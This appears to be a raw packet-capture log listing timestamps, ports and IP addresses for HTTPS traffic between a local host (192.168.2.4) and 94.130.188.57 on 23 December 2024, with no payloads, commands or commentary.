                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.899424076 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.899590969 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.899631977 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.899724960 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.899727106 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.899775028 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.899777889 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.899821997 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.899876118 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.900059938 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.900132895 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.900690079 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.900782108 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.900959969 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.900995970 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947335005 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947539091 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947596073 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947607994 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947607994 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947663069 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947665930 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947704077 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947717905 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947741985 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947746992 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947756052 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947774887 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947774887 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947825909 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947865963 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:01.947932005 CET4434977994.130.188.57192.168.2.4
Dec 23, 2024 06:22:01.947974920 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:01.947997093 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:01.948043108 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:01.948065996 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:01.948098898 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:01.948121071 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:01.948178053 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:01.948267937 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:01.948292971 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:01.995354891 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:01.995443106 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.019741058 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.019920111 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.019965887 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.020124912 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.020191908 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.020191908 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.021424055 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.021441936 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.021575928 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.021661997 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.021825075 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.021878004 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.023272038 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.023416996 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.023483038 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.023513079 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.023753881 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.023807049 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.024831057 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.025006056 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.025083065 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.025238037 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.025283098 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.025451899 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.071353912 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.121663094 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.121805906 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.121854067 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.121985912 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.122024059 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.122184992 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.139421940 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.139524937 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.139714003 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.139775038 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.141546011 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.141630888 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.141659021 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.144653082 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.145692110 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.145776987 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.145817041 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.145838976 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.145915985 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.145948887 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.145967007 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.145998001 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.146034956 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.146044970 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.146097898 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.146164894 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.146190882 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.146224976 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.146253109 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.146259069 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.146306038 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.146315098 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.146338940 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.146358013 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.146370888 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.146374941 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.146399975 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.146400928 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.146428108 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.146444082 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.146459103 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.146469116 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.146519899 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.146522045 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.146553993 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.146575928 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.146588087 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.146604061 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.146610022 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.146651030 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.146670103 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.146713018 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.146744013 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.146760941 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.146806955 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.146838903 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.146863937 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.146899939 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.146946907 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.146975040 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.147005081 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.147106886 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.147245884 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.147290945 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.147382975 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.147492886 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.147533894 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:02.147566080 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.147597075 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:02.147661924 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.147663116 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.148283958 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.148371935 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.148536921 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.148577929 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.165575981 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.165735960 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.165772915 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.165832043 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.165929079 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.165997028 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.166014910 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.166043043 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.166043997 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.166071892 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.207351923 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.207540989 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.207591057 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.241156101 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.241223097 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.241436958 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.241472960 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.241512060 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.241547108 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.241616964 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.241681099 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.242474079 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.242522955 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.242691994 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.242719889 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.242774010 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.242830992 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.242854118 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259008884 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259170055 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259289026 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259371996 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259413958 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259433985 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259465933 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259521961 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259547949 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259572983 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259627104 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259628057 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259675980 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259701014 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259735107 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.259752035 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.260621071 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.260643959 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.260790110 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.260860920 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.261085033 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.261142969 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.262403965 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.262485981 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.262643099 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.262686968 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.262739897 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.262881041 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.263052940 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.263118029 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.264075994 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.264164925 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.264349937 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.264405012 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.264425993 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.265808105 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.265988111 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.266068935 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.266068935 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.266088963 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.266108990 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.266119957 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.266141891 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.266154051 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.266431093 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.266535997 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.266590118 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.266613960 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.266627073 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515799046 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515824080 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515825033 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515850067 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515850067 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515871048 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515917063 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515917063 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515924931 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515950918 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515952110 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.515978098 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516019106 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516031981 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516063929 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516127110 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516172886 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516211987 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516232014 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516350031 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516438961 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516506910 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516536951 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516542912 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516566992 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516567945 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516678095 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516702890 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516829014 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.516933918 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.517040968 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.517421007 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.517462015 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.517478943 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.517533064 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.517561913 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.518008947 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.518642902 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.518678904 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.518703938 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.518728971 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.518776894 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.518795967 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.518820047 CET49779443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.546746016 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:02.620907068 CET4434977994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:03.276139021 CET4434978594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:03.276237965 CET49785443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:03.277878046 CET49785443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:03.277904034 CET4434978594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:03.280055046 CET49785443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:03.280069113 CET4434978594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.159605026 CET4434978594.130.188.57192.168.2.4
